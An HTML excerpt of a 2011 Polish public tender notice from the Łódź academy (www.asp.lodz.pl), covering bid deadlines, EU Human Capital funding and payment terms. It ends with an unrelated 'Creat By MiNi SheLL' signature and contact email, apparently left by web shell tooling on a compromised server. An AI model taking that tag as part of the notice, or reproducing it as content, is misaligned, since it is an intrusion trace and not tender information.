<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.asp.lodz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2011 godzina 10:00, miejsce: Oferty należy złożyć w siedzibie Zamawiającego, ul. Wojska Polskiego 121, 91-726 Łódź, w pok. 41, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest ze środków Unii Europejskiej. Projekt pod tytułem Akademia multimediów i wystawiennictwa realizowany jest dzięki dofinansowaniu ze środków Unii Europejskiej, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VIII Regionalne kadry gospodarki, Poddziałanie 8.1.1 Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw.
1) Płatność za wykonanie przedmiotu zamówienia realizowana będzie systematycznie raz w miesiącu, na podstawie prawidłowo wystawianej faktury VAT, rachunku, sporządzonej przez Wykonawcę po spisaniu protokołu zdawczo-odbiorczego przez Zamawiającego,
2)  Termin płatności wymagany przez Zamawiającego: 30 dni po otrzymaniu faktury, rachunku na konto Wykonawcy, 
3)  Termin płatności może ulec wydłużeniu do czasu otrzymania środków z Instytucji Zarządzającej.
4) W przypadku nieotrzymania środków z Instytucji Zarządzającej, Zamawiający w terminie 3 dni przed upływem terminu, o którym mowa w ust. 2 niniejszego punktu, poinformuje Wykonawcę o możliwości przedłużenia terminu płatności. Maksymalny termin przedłużenia terminu płatności to 3 miesiące licząc od daty, otrzymania faktury ,rachunku od Wykonawcy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com